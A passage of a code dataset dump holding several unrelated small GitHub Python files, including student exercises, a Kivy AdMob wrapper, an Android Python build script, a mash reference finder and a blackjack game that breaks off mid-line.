people ['Neko', 'Moose', 'Neko'] should return True, since Neko decided to come back.\n \n\nFUNCTION SIGNATURE\ndef seenYouBefore(patrons: list) -> bool:\n'''\n\n\ndef seenYouBefore(patrons: list) -> bool:\n patron_set = set()\n\n for patron in patrons:\n if patron in patron_set:\n return True\n else:\n patron_set.add(patron)\n\n return False\n\n\nprint(seenYouBefore([]) == False)\nprint(seenYouBefore(['Sweet Tea', 'Oliver', 'Pinky',\n 'Sweet Tea', 'Pixel', 'Jelly']) == True)\nprint(seenYouBefore(['Neko', 'Neko']) == True)\nprint(seenYouBefore(['Moose', 'Porkchop', 'Sweet Tea', 'Hercules']) == False)\n","repo_name":"jonathanyulan99/SDE-Fundamentals","sub_path":"ALL/Formation/Set_Drills/seen_you_before.py","file_name":"seen_you_before.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9922660350","text":"\"\"\"program to determine whether students need to see an advisor based on mean and standard deviation\r\nyasha longstaff\r\n13 may 2014\"\"\"\r\n\r\nimport math\r\n\r\nfilename = input('Enter the marks filename:\\n')\r\n\r\nfile = open(filename, \"r\")\r\nmarks = file.readlines()\r\nfile.close()\r\n\r\naggregate = 0\r\nfor item in marks:\r\n position = item.find(',')\r\n aggregate += eval(item[position+1:])\r\nmean = \"{0:.2f}\".format(aggregate/len(marks))\r\n\r\ndeviation = 0\r\nvariance_squared = 0\r\nfor item in marks:\r\n position = item.find(',')\r\n deviation = (float(item[position+1:])- float(mean))**2\r\n variance_squared += deviation\r\nvariance = math.sqrt((variance_squared)/len(marks))\r\n\r\nprint('The average is:', mean)\r\nprint('The std deviation is:', \"{0:.2f}\".format(variance))\r\n\r\niter = False\r\n\r\nfor item in marks:\r\n if iter == False:\r\n print('List of students who need to see an advisor:')\r\n iter = True\r\n\r\n position = item.find(',')\r\n if eval(item[position+1:]) < (float(mean) - float(variance)):\r\n print(item[:position])\r\n else:\r\n continue\r\n \r\n\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/lngyas001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15890888031","text":"import plyer\nfrom kivy import platform, Logger\n\n__version__ = '1.0'\n\nif platform == \"android\":\n try:\n from jnius import autoclass, cast, PythonJavaClass, java_method\n from android.runnable import run_on_ui_thread\n\n activity = autoclass(\"org.kivy.android.PythonActivity\")\n\n AdRequest = autoclass(\"com.google.android.gms.ads.AdRequest\")\n AdRequestBuilder = autoclass(\n \"com.google.android.gms.ads.AdRequest$Builder\"\n )\n\n AdSize = autoclass(\"com.google.android.gms.ads.AdSize\")\n AdView = autoclass(\"com.google.android.gms.ads.AdView\")\n MobileAds = autoclass(\"com.google.android.gms.ads.MobileAds\")\n LayoutParams = autoclass(\"android.view.ViewGroup$LayoutParams\")\n LinearLayout = autoclass(\"android.widget.LinearLayout\")\n Gravity = autoclass(\"android.view.Gravity\")\n View = autoclass(\"android.view.View\")\n\n except Exception as err:\n Logger.error(\"KivyBannerMob: \" + str(err))\nelse:\n\n def run_on_ui_thread(x):\n pass\n\n\nclass TestIds:\n \"\"\" Test AdMob App ID \"\"\"\n APP = \"ca-app-pub-3940256099942544~3347511713\"\n\n \"\"\" Test Banner Ad unit ID \"\"\"\n BANNER = \"ca-app-pub-3940256099942544/6300978111\"\n\n\nclass AdMobBridge:\n def __init__(self, appID):\n pass\n\n def add_test_device(self, test_device):\n pass\n\n def load_banner_ad(self, bannerID):\n pass\n\n def show_banner(self):\n pass\n\n\nclass Admob(AdMobBridge):\n @run_on_ui_thread\n def __init__(self, appID, useTestDevice):\n super().__init__(appID)\n if useTestDevice:\n MobileAds.initialize(activity.mActivity, TestIds.APP)\n else:\n Logger.info(\"KivyBannerMob: Admob App ID initialized with \" + str(appID))\n MobileAds.initialize(activity.mActivity, appID)\n\n self._adview = AdView(activity.mActivity)\n self.useTestDevice = useTestDevice\n self._test_devices = []\n\n @run_on_ui_thread\n def load_banner_ad(self, bannerID):\n\n if self.useTestDevice:\n self._adview.setAdUnitId(TestIds.BANNER)\n else:\n Logger.info(\"KivyBannerMob: BannerAd using unit ID \" + str(bannerID))\n self._adview.setAdUnitId(bannerID)\n\n self._adview.setAdSize(AdSize.SMART_BANNER)\n\n self._adview.setVisibility(View.GONE)\n adLayoutParams = LayoutParams(\n LayoutParams.MATCH_PARENT, LayoutParams.WRAP_CONTENT\n )\n self._adview.setLayoutParams(adLayoutParams)\n layout = LinearLayout(activity.mActivity)\n layout.setGravity(Gravity.BOTTOM)\n layout.addView(self._adview)\n layoutParams = LayoutParams(\n LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT\n )\n layout.setLayoutParams(layoutParams)\n activity.addContentView(layout, layoutParams)\n\n self.builder = AdRequestBuilder()\n\n if self.useTestDevice:\n Logger.info(\"KivyBannerMob: Adding Test Device: \" + str(plyer.uniqueid.id))\n self.add_test_device(str(plyer.uniqueid.id))\n else:\n Logger.info(\"KivyBannerMob: Showing live ads from Admob\")\n\n Logger.info(\"KivyBannerMob: AdView loaded.\")\n self._adview.loadAd(self.builder.build())\n\n @run_on_ui_thread\n def add_test_device(self, test_device):\n for test_device in self._test_devices:\n self.builder.addTestDevice(test_device)\n\n @run_on_ui_thread\n def show_banner(self):\n Logger.info(\"KivyBannerMob: show_banner called.\")\n self._adview.setVisibility(View.VISIBLE)\n\n @run_on_ui_thread\n def hide_banner(self):\n Logger.info(\"KivyBannerMob: hide_banner called.\")\n self._adview.setVisibility(View.GONE)\n\n\nclass KivyBannerMob:\n def __init__(self, appID, useTestDevice=True):\n Logger.info(\"KivyBannerMob: __init__ called.\")\n if platform == \"android\":\n # Setting below to True, will override your appID and bannerID to use test ads :)\n self.bridge = Admob(appID, useTestDevice) # app ID\n else:\n Logger.warning(\"KivyBannerMob: This only runs on Android devices\")\n\n def load_banner_ad(self, unitID):\n self.bridge.load_banner_ad(unitID) # ad unit ID\n\n def show_banner(self):\n self.bridge.show_banner()\n\n def hide_banner(self):\n self.bridge.show_banner()","repo_name":"ziyaad30/KivyBannerMob","sub_path":"src/KivyBannerMob/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70169754682","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\n# Load the vocabulary\r\nvocabulary = np.load('vocabulary.npy', allow_pickle=True).item()\r\n\r\n# Load the encoded input data\r\ninput_padded_sequences = np.load('encoded_input_data.npy')\r\n\r\n# Get the maximum sequence length\r\nmax_seq_length = input_padded_sequences.shape[1]\r\n\r\n# Define the special tokens\r\nstart_token = ''\r\nend_token = ''\r\npad_token = ''\r\n\r\n# Load the saved model\r\nmodel = tf.keras.models.load_model('diacritizer.h5')\r\n\r\n# Define a function to diacritize a single sentence\r\ndef diacritize_sentence(sentence, model, vocabulary):\r\n reverse_vocabulary = {idx: char for char, idx in vocabulary.items()}\r\n\r\n sentence = sentence.lower()\r\n\r\n # Encode the input sentence\r\n input_encoded = []\r\n for char in sentence:\r\n if char in 'aeiou':\r\n input_encoded += [vocabulary[start_token], vocabulary[char], vocabulary[end_token]]\r\n else:\r\n input_encoded += [vocabulary[char]]\r\n\r\n # Pad the encoded input sentence\r\n input_padded = pad_sequences([input_encoded], maxlen=max_seq_length, padding='post', value=vocabulary[pad_token])\r\n print(input_padded)\r\n\r\n # Diacritize the sentence by predicting the output sequence using the model\r\n output_padded = model.predict([input_padded, np.zeros((1, max_seq_length))])[0]\r\n print(output_padded)\r\n output_encoded = [np.argmax(token) for token in output_padded]\r\n \r\n # Find the position of the final end_token in the output sequence\r\n end_token_positions = [i for i, val in enumerate(output_encoded) if val == vocabulary[end_token]]\r\n if end_token_positions:\r\n end_position = end_token_positions[-1]\r\n else:\r\n end_position = len(output_encoded)\r\n\r\n output_sequence = [reverse_vocabulary[val] for val in output_encoded[:end_position] if val != vocabulary[pad_token]]\r\n output_sentence = ''.join(output_sequence)\r\n\r\n return output_sentence\r\n\r\n# Define an example sentence\r\nsentence = \"Ko te whare tenei o nga tangata katoa\"\r\n\r\n# Diacritize the sentence\r\ndiacritized_sentence = diacritize_sentence(sentence, model, vocabulary)\r\n\r\n# Print the original and diacritized sentences\r\nprint(f\"Original sentence: {sentence}\")\r\nprint(f\"Diacritized sentence: {diacritized_sentence}\")","repo_name":"cmnakano/midiacritizer","sub_path":"diacritize.py","file_name":"diacritize.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19938073878","text":"from gmpy2 import next_prime, is_prime\nfrom itertools import permutations, combinations\n\nn = 999\n\nwhile True:\n n = next_prime(n)\n primes = []\n for perm in set(permutations(str(n))):\n if is_prime(int(''.join(perm))):\n primes.append(perm)\n \n for c in combinations(primes, 3):\n c = list(map(lambda x: int(''.join(x)), c))\n c.sort()\n if c[1] - c[0] == 3330 and c[2] - c[1] == 3330:\n ans = ''.join(map(str, c))\n if ans == '148748178147':\n continue\n print('The answer is: {}'.format(ans))\n exit(0)","repo_name":"MaximeGoyette/projecteuler","sub_path":"049.py","file_name":"049.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69808929400","text":"#!/usr/bin/env python\n'''\n\nChange HEADER CRPIX3 (channel) and write a new fits file, so that channel map labels can be symmetric across systemic velocity\n\nLast Modified: 4 May 2016\n\nAuthor: Daisy Leung\n\nHistory:\n04 May 2016\n - GILDAS don't recognize the unit of velocity axis: write extra cube with hdr[\"CTYPE3\"] = \"VELO-LSR\"\n30 Apr 2016\n - created, works with COchan.py\n\nNote:\n-\n\n'''\n\n\nimport pywcs\nimport pyfits\n\nfinal_image = '/Users/admin/Research/RXJ1131/PdBI/data/30Apr16/sup127_155_2ndcln_noCont.fits'\nfits_cube = pyfits.open(final_image)\nheader = fits_cube[0].header\n# Use channel 145 as 0 km/s, chosen using `go view` and also corresponds to z~0.654\nheader['CRPIX3'] = 145.0\n\n# sanity check\nwcs = pywcs.WCS(header)\nx = wcs.sub([3])\nx.wcs_pix2sky([[130]], 0)/1e3\nx.wcs_pix2sky([[145]], 0)/1e3\n\n# this works with COchan.py, don't mess with it\noutfile = '/Users/admin/Research/RXJ1131/PdBI/data/30Apr16/centralizedCube.fits'\nfits_cube.writeto(outfile, clobber=True)\n\n# write an additional cube with hdr[\"CTYPE3\"] = \"VELO-LSR\"\nheader['CTYPE3'] = \"VELO-LSR\"\noutfile = '/Users/admin/Research/RXJ1131/PdBI/data/30Apr16/centralizedCube4GILDAS.fits'\nfits_cube.writeto(outfile, clobber=True)\n","repo_name":"astro313/RXJ1131","sub_path":"PdBI/src/pythonPLOT/shiftRefVelo.py","file_name":"shiftRefVelo.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26789221272","text":"\"\"\"\nGiven a list of FASTQ files, and a list of reference sequences,\nuse mash to calculate the distance, and then find the closest \nreference sequence to the FASTQ files. Return the path to the \nclosest reference sequence.\n\"\"\"\n\nimport argparse\nimport asyncio\nimport pathlib\nimport re\nimport urllib.request\n\n# WEBENV = re.compile(r'(\\S+)')\n# KEY = re.compile(r'(\\d+)')\n# ASM_RELEASE_DATE_GENBANK = re.compile('(\\S+_')\n# ASM_RELEASE_DATE_REFSEQ = re.compile('(\\S+)')\n\n\ndef parse_args():\n \"\"\"\n Parse the command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Find the closest reference sequence to a set of FASTQ files.\")\n parser.add_argument(\"-f\", \"--fastq\", nargs=\"+\", help=\"FASTQ files to compare to the reference sequences.\", required=True, type=pathlib.Path)\n parser.add_argument(\"-r\", \"--ref\", nargs=\"+\", help=\"Reference sequences to compare the FASTQ files to.\", required=True, type=pathlib.Path)\n parser.add_argument(\"-t\", \"--threads\", help=\"Number of threads to use.\", default=1, type=int)\n parser.add_argument(\"-e\", \"--email\", help=\"Email address to use for Entrez.\", default=\"andersgs+entrez@gmail.com\")\n return parser.parse_args()\n\n\nasync def run_mash(reads, ref):\n \"\"\"\n Run mash.\n \"\"\"\n cmd = f\"mash dist {ref} {' '.join([str(r) for r in reads])}\"\n proc = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE\n )\n stdout, _ = await proc.communicate()\n return stdout.decode('utf-8')\n\n\n# async def search_entrez(term, email):\n# \"\"\"\n# Search Entrez for a term.\n# \"\"\"\n# base = 'https://eutils.ncbi.nlm.nih.gov/entrez/eutils/'\n# db = 'assembly'\n# url = f\"{base}esearch.fcgi?db={db}&term={term}&usehistory=y\"\n# request = urllib.request.urlopen(url)\n# data = request.read().decode('utf-8')\n# webenv = WEBENV.search(data).group(1)\n# key = KEY.search(data).group(1)\n# url = base + f\"esummary.fcgi?db={db}&query_key={key}&WebEnv={webenv}\"\n\n\nasync def safe_mash(reads, ref, sem):\n \"\"\"\n Add mash to the task quey using semaphore to limit the number of threads.\n \"\"\"\n async with sem:\n return await run_mash(reads, ref)\n\n\nasync def main():\n \"\"\"\n Main function.\n \"\"\"\n args = parse_args()\n sem = asyncio.Semaphore(args.threads)\n fastq_files = args.fastq\n ref_files = args.ref\n tasks = [\n asyncio.ensure_future(safe_mash(fastq_files, ref, sem)) for ref in ref_files\n ]\n results = await asyncio.gather(*tasks)\n dists = []\n for result in results:\n data = [res.split(\"\\t\") for res in result.strip().split(\"\\n\")]\n mean_dist = sum([float(d[2]) for d in data]) / len(data)\n dists.append([data[0][0], mean_dist])\n sorted(dists, key=lambda x: x[1])\n min_mean_dist = dists[0][1]\n suitable_refs = [d[0] for d in dists if d[1] == min_mean_dist]\n if len(suitable_refs) > 1:\n print(f\"Multiple reference sequences found with the same distance to the FASTQ files. Please check the reference sequences.\")\n print(suitable_refs)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"lgi-onehealth/orkas","sub_path":"bin/find_ref.py","file_name":"find_ref.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44150685715","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport sys\nimport os\nimport shutil\nimport json\nimport time\n\ndef run(*command, cwd=None):\n print(command)\n try:\n result = subprocess.run(command, cwd=cwd)\n except OSError:\n return 127, []\n return result.returncode, \"\" # TODO\n\ndef read_properties(fname):\n data = {}\n with open(fname, 'r') as f:\n for line in f:\n fields = [x.strip() for x in line.split('=')]\n data[fields[0]] = fields[1]\n return data\n\ndef check_git():\n rcode, stdout = run('git', '--version')\n return rcode == 0\n\ndef check_python():\n if os.path.exists('python'):\n if not os.path.isdir('python'):\n return 1\n else:\n if os.path.exists('python/.git'):\n return 2\n else:\n return 1\n else:\n return 0\n\ndef check_ndk(ndk_dir, min_ver, checking_sub=False):\n if not os.path.exists(ndk_dir):\n return 1\n if os.path.exists(ndk_dir + '/source.properties'):\n info = read_properties(ndk_dir + '/source.properties')\n if not 'Pkg.Revision' in info:\n return 1\n vn = [int(x) for x in info['Pkg.Revision'].split('.')]\n for i in range(len(vn)):\n if i >= len(min_ver):\n print('versions equal')\n return 0\n elif vn[i] > min_ver[i]:\n print('later version')\n return 0\n elif vn[i] < min_ver[i]:\n print('earlier version')\n return 1\n print('versions equal')\n return 0\n else:\n return 1\n\ndef trymkdir(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n return 0\n elif not os.path.isdir(dir):\n print(\"'%s' exists and is a file. Please move or delete it.\" % dir)\n return 1\n else:\n return 0\n\ndef copy(src, dest):\n print(\"%s -> %s\" % (src, dest))\n shutil.copy(src, dest)\n\ndef main():\n start_time = time.perf_counter()\n print(\"Building Python for Android 24 64-bit ARM (aarch64-linux-android)\")\n print(\"Checking/installing dependencies\")\n\n # TODO arguments\n py_version='v3.9.2'\n ndk_dir=os.getenv('HOME') + '/Android/Sdk/ndk/22.0.7026061'\n ndk_min_ver=(22,)\n make_jobs=6\n target='aarch64-linux-android'\n android_ver='24'\n shell='/usr/bin/bash'\n make='/usr/bin/make'\n tar='/usr/bin/tar'\n force_build=False\n\n if not check_git:\n print(\"Could not find Git. Is it in your PATH?\")\n sys.exit(1)\n\n res = check_python()\n if res == 1:\n print(\"'python' is already a file or directory. Please delete or move it.\")\n sys.exit(1)\n elif res == 2:\n print(\"'python' submodule found\")\n else:\n rval = run('git', 'submodule', 'update')[0]\n if rval != 0:\n print(\"Clone failed!\")\n sys.exit(2)\n\n print(\"Checkout version '%s'\" % py_version)\n rval = run('git', '-C', 'python/', 'checkout', py_version)[0]\n if rval != 0:\n print(\"Checkout failed!\")\n sys.exit(2)\n\n print(\"Checking NDK\")\n if check_ndk(ndk_dir, ndk_min_ver) != 0:\n print(\"NDK not found. Please install NDK version %s or later and specify --ndk-dir\" % ('.'.join(min_ver)))\n sys.exit(1)\n\n print(\"Setting up build environment\")\n if trymkdir('build') != 0:\n sys.exit(1)\n with open('build/config.site', 'w') as f:\n f.write('ac_cv_file__dev_ptmx=no\\n')\n f.write('ac_cv_file__dev_ptc=no\\n')\n\n arguments=[shell, '../python/configure']\n\n toolchain = ndk_dir + '/toolchains/llvm/prebuilt/linux-x86_64'\n arguments.append('--srcdir=../python')\n arguments.append('--prefix=' + os.path.realpath('out/'))\n arguments.append('--build=x86_64-pc-linux-gnu')\n arguments.append('--host=' + target)\n arguments.append('--disable-ipv6')\n arguments.append('CONFIG_SITE=config.site')\n arguments.append('TOOLCHAIN=' + toolchain)\n arguments.append('TARGET=' + target)\n arguments.append('API=' + android_ver)\n arguments.append('AR=' + toolchain + '/bin/llvm-ar')\n arguments.append('CC=' + toolchain + '/bin/' + target + android_ver + '-clang')\n arguments.append('AS=' + toolchain + '/bin/' + target + android_ver + '-clang')\n arguments.append('CXX=' + toolchain + '/bin/' + target + android_ver + '-clang++')\n arguments.append('LD=' + toolchain + '/bin/ld')\n arguments.append('RANLIB=' + toolchain + '/bin/llvm-ranlib')\n arguments.append('STRIP=' + toolchain + '/bin/llvm-strip')\n arguments.append('READELF=' + toolchain + '/bin/llvm-readelf')\n arguments.append('LD_LIBRARY_PATH=' + toolchain + '/sysroot/usr/lib/' + target + \\\n ':' + toolchain + '/sysroot/usr/lib' + target + '/' + android_ver)\n\n if not os.path.exists('out/bin') or force_build:\n rval = run(*arguments, cwd='build/')[0]\n if rval != 0:\n print(\"configure failed (%d)\" % rval)\n sys.exit(2)\n\n rval = run(make, 'clean', cwd='build/')[0]\n if rval != 0:\n print(\"clean failed (%d)\" % rval)\n sys.exit(2)\n\n rval = run(make, '-j' + str(make_jobs), cwd='build/')[0]\n if rval != 0:\n print(\"compilation failed (%d)\" % rval)\n sys.exit(2)\n\n rval = run(make, 'install', cwd='build/')[0]\n if rval != 0:\n print(\"install failed (%d)\" % rval)\n sys.exit(2)\n\n pyver_numbers = py_version[1:].split('.')\n python_executable = 'python' + '.'.join(pyver_numbers[0:2])\n\n print(\"Building install archive\")\n if trymkdir('install') != 0:\n sys.exit(2)\n if os.path.exists('install'):\n for fname in os.listdir('install'):\n os.remove('install/' + fname)\n\n copy('out/bin/' + python_executable, 'install/' + python_executable)\n install_archive = 'install/' + python_executable + '.tar.gz'\n if os.path.exists(install_archive):\n os.remove(install_archive)\n run(tar, '-C', 'out/lib', '-cvzf', install_archive, 'python3.9/')\n\n build_time = time.localtime()\n\n install_info = {\n 'version': py_version[1:],\n 'python': python_executable,\n 'build-tool-version': '1.0.0',\n 'build-date': time.strftime('%Y-%m-%d %H:%M', build_time)\n }\n\n with open('install/install-info.txt', 'w') as f:\n json.dump(install_info, f)\n\n # copy install scripts\n copy('install-tools/install.py', 'install/install.py')\n copy('install-tools/install-setup.sh', 'install/install-setup.sh')\n copy('install-tools/README.txt', 'install/README.txt')\n copy('LICENSE', 'install/LICENSE.txt')\n\n print()\n print(\"Creating zip archive...\")\n output_name = 'android-python-%s-%s' % (py_version, time.strftime('%Y%m%d_%H%M', build_time))\n shutil.make_archive(output_name, 'zip', 'install')\n print(\"Done! (%.3f s)\" % (time.perf_counter() - start_time))\n print()\n\nif __name__ == '__main__':\n main()\n","repo_name":"cdbbnnyCode/android-python","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18736227522","text":"import json \n\nwith open('json/data.json', 'r') as f:\n data = json.loads(f.read()) \n\ndef sort_dict(data):\n data = dict(sorted(data.items(), key=lambda x: x[1]['slno']))\n\n for key, value in data.items():\n value['videos'] = dict(sorted(value['videos'].items(), key=lambda x: x[1]['slno']))\n \n return data \n\nwith open('x.json', 'w') as f:\n f.write(json.dumps(sort_dict(data)))","repo_name":"rittwickBhabak/online-courses","sub_path":"utils/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22545910366","text":"\"\"\"\r\nProblem 2: Add Two Numbers. \r\n\r\nAPAS' description of problem: \r\n\r\n\t\"You are given two non-empty linked lists representing two non-negative integers.\r\n\t The digits are stored in reverse order and each of their nodes contain a single digit.\r\n\t Add the two numbers and return it as a linked list. \r\n\t You may assume the two numbers do not contain any leading zero, except the number 0 itself.\"\r\n\r\n\"\"\"\r\n# Creating linked list\r\nclass Node: \r\n\tdef __init__(self, dataval=None): \r\n\t\tself.dataval = dataval \r\n\t\tself.nextval = None \r\n\r\nclass SLinkedList: \r\n\tdef __init__(self, dataval=None): \r\n\t\tself.headval = None \r\n\r\n# First linked list\r\nlist1 = SLinkedList() \r\nlist1.headval = Node(2)\r\ne2 = Node(4)\r\ne3 = Node(3)\r\nlist1.headval.nextval = e2 # Connecting first node to second \r\ne2.nextval = e3 # Connecting second node to third\r\n\r\n# Second linked list\r\nlist2 = SLinkedList() \r\nlist2.headval = Node(5)\r\nf2 = Node(6)\r\nf3 = Node(4)\r\nlist1.headval.nextval = f2 \r\nf2.nextval = f3 \r\n\r\n# Adding the respective numbers and reversing the order.\r\ng1 = list1.headval.dataval + list2.headval.dataval \r\ng2 = e2.dataval + f2.dataval \r\ng3 = e3.dataval + f3.dataval \r\n\r\n# When digit is ten or above, add to the higher order.\r\nif g1 >= 10: \r\n\tg1 = str(g1)\r\n\tg2 += int(g1[0]) \r\n\tif g1 == 0 or g1 == None:\r\n\t\tg1 = 0 \r\n\telse: \r\n\t\tg1 = int(g1[1])\r\nif g2 >= 10: \r\n\tg2 = str(g2)\r\n\tg3 += int(g2[0]) \r\n\tif g2 == 0 or g2 == None:\r\n\t\tg2 = 0 \r\n\telse: \r\n\t\tg2 = int(g2[1])\r\n\r\n# Setting up solution in a new linked list. \t\r\nlist_solution = SLinkedList() \r\nlist_solution.headval = Node(g3) \r\ni2 = Node(g2)\r\ni3 = Node(g1) \r\nlist_solution.headval.nextval = i2 \r\ni2.nextval = i3\r\n\t\r\noutput = str(list_solution.headval.dataval) + \" \" + str(i2.dataval) + \" \" + str(i3.dataval)\r\n\r\nprint (output)\r\n","repo_name":"MisesRevived/APAS","sub_path":"addtwonumbers.py","file_name":"addtwonumbers.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28304850669","text":"import threading\n\nONGOING = 0\nPLAYER_WIN = 1\nPLAYER_LOSE = 2\nPLAYER_BUST = 3\nHOUSE_BUST = 4\nDRAW = 5\nPLAYER_DONE = 6\n\nHIT = 11\nHOLD = 12\nDOUBLE = 13\nSPLIT = 14\n\nHOUSE = 'HOUSE'\nPLAYER = 'PLAYER'\n\nINVALID_BET = 'Invalid Bet'\nINSUFFICIENT_CREDITS = 'Insufficient Credits'\nINVALID_DOUBLE = 'Cannot Double Down'\nINVALID_SPLIT = 'Cannot Split'\n\nTHRESHOLD = 17\n\n\nclass BlackjackException(Exception):\n pass\n\n\nclass InvalidBetException(BlackjackException):\n pass\n\n\nclass InsufficientCreditsException(BlackjackException):\n pass\n\n\nclass InvalidDoubleStateException(BlackjackException):\n pass\n\n\nclass InvalidSplitStateException(BlackjackException):\n pass\n\n\nclass Blackjack():\n def __init__(self, credits, deck, bet, house_user, player_user):\n if credits.get_user_creds(player_user) < bet:\n raise InsufficientCreditsException(INSUFFICIENT_CREDITS)\n\n bet_test = bet / 2 * 3\n if bet <= 0 or (bet_test - int(bet_test) != 0):\n raise InvalidBetException(INVALID_BET)\n\n self.credits = credits\n self.lock = threading.Lock()\n self.bets = [bet]\n self.doubled = [False]\n self.curr_hand = 0\n self.deck = deck\n self.deck.lock.acquire()\n self.house_cards = [self.deck.draw(), self.deck.draw(1)]\n self.player_cards = [[self.deck.draw(), self.deck.draw()]]\n self.deck.lock.release()\n self.turn = PLAYER\n self.states = [ONGOING]\n self.net = -bet\n\n self.house_user = house_user\n self.player_user = player_user\n\n self.credits.transfer_from_to(player_user, house_user, bet)\n\n self._determine_state()\n\n def calc_32(self, bet):\n payout = int(bet / 2 * 3)\n if payout % 2 == 0:\n return payout\n return payout + 1\n\n def get_states(self):\n return self.states\n\n def get_curr_state(self):\n if self.curr_hand == len(self.states):\n return PLAYER_DONE\n return self.states[self.curr_hand]\n\n def set_state(self, state, index):\n if state in [ONGOING, PLAYER_WIN, PLAYER_LOSE,\n PLAYER_BUST, HOUSE_BUST, DRAW]:\n self.states[index] = state\n\n def set_curr_state(self, state):\n self.set_state(state, self.curr_hand)\n\n def _determine_state(self):\n curr_state = self.get_curr_state()\n house_sum = best_sum(self.house_cards)\n if curr_state == ONGOING:\n curr_bet = self.bets[self.curr_hand]\n curr_player_hand = self.player_cards[self.curr_hand]\n player_sum = best_sum(curr_player_hand)\n num_player_cards = len(curr_player_hand)\n\n # Beginning State, 2 cards both sides\n # if num_house_cards == num_player_cards == 2:\n if num_player_cards == 2:\n # Handle auto win when house or player dealt 21\n if house_sum == player_sum == 21 or player_sum == 21:\n self.set_curr_state(PLAYER_WIN)\n elif house_sum == 21:\n self.set_curr_state(PLAYER_LOSE)\n else:\n return\n self.curr_hand += 1\n self._determine_state()\n # Player Turn\n elif self.turn == PLAYER:\n if player_sum > 21:\n self.set_curr_state(PLAYER_BUST)\n # When player busts, Move to next hand\n self.curr_hand += 1\n # If all player hands are done\n if self.curr_hand == len(self.player_cards):\n # Change turn to house\n self.turn = HOUSE\n # If player split, make house hit to have a hand to compare\n if len(self.player_cards) > 1:\n self.hit()\n # If player not split, continue/end game\n else:\n self._determine_state()\n # If not all player hands done, continue player turn\n else:\n self._determine_state()\n elif curr_state == PLAYER_DONE:\n # House Turn\n for i in range(len(self.player_cards)):\n curr_bet = self.bets[i]\n curr_player_sum = best_sum(self.player_cards[i])\n if self.states[i] == ONGOING:\n if curr_player_sum > 21 and house_sum > 21:\n self.set_state(DRAW, i)\n elif curr_player_sum > 21:\n self.set_state(PLAYER_BUST, i)\n elif house_sum > 21:\n self.set_state(HOUSE_BUST, i)\n elif house_sum > curr_player_sum:\n self.set_state(PLAYER_LOSE, i)\n elif house_sum < curr_player_sum:\n self.set_state(PLAYER_WIN, i)\n elif house_sum == curr_player_sum:\n self.set_state(DRAW, i)\n\n if self.states[i] in [HOUSE_BUST, PLAYER_WIN]:\n is_two = len(self.player_cards[i]) == 2\n is_blackjack = house_sum == curr_player_sum == 21 or curr_player_sum == 21\n if self.states[i] == PLAYER_WIN and is_two and is_blackjack:\n # Bet Payout 3:2\n self.net += curr_bet + self.calc_32(curr_bet)\n else:\n self.net += curr_bet + curr_bet\n elif self.states[i] == DRAW:\n self.net += curr_bet\n # End of Game, distribute winnings\n self.credits.transfer_from_to(self.house_user, self.player_user, self.net + sum(self.bets))\n\n def hit(self):\n self.deck.lock.acquire()\n if self.turn == HOUSE:\n house_sum = best_sum(self.house_cards)\n while house_sum < THRESHOLD:\n self.house_cards += [self.deck.draw()]\n house_sum = best_sum(self.house_cards)\n elif self.turn == PLAYER:\n self.player_cards[self.curr_hand] += [self.deck.draw()]\n self.deck.lock.release()\n self._determine_state()\n\n def hold(self):\n self.curr_hand += 1\n if self.curr_hand == len(self.player_cards):\n self.turn = HOUSE\n self.hit()\n else:\n self._determine_state()\n\n def double(self):\n if self.turn != PLAYER:\n return\n curr_index = self.curr_hand\n if not self.doubled[curr_index] and len(self.player_cards[curr_index]) == 2:\n player_creds = self.credits.get_user_creds(self.player_user)\n if player_creds >= self.bets[curr_index]:\n self.credits.transfer_from_to(self.player_user, self.house_user, self.bets[curr_index])\n self.net -= self.bets[curr_index]\n self.doubled[curr_index] = True\n self.bets[curr_index] *= 2\n self.hit()\n if self.states[curr_index] == ONGOING:\n self.hold()\n else:\n raise InsufficientCreditsException(INSUFFICIENT_CREDITS + ' to Double Down')\n else:\n raise InvalidDoubleStateException(INVALID_DOUBLE)\n\n def split(self):\n if self.turn != PLAYER:\n return\n curr_cards = self.player_cards[self.curr_hand]\n if len(curr_cards) == 2 and curr_cards[0] == curr_cards[1]:\n user_creds = self.credits.get_user_creds(self.player_user)\n curr_bet = self.bets[self.curr_hand]\n if user_creds >= curr_bet:\n self.deck.lock.acquire()\n self.player_cards[self.curr_hand] = [curr_cards[0], self.deck.draw()]\n self.player_cards += [[curr_cards[1], 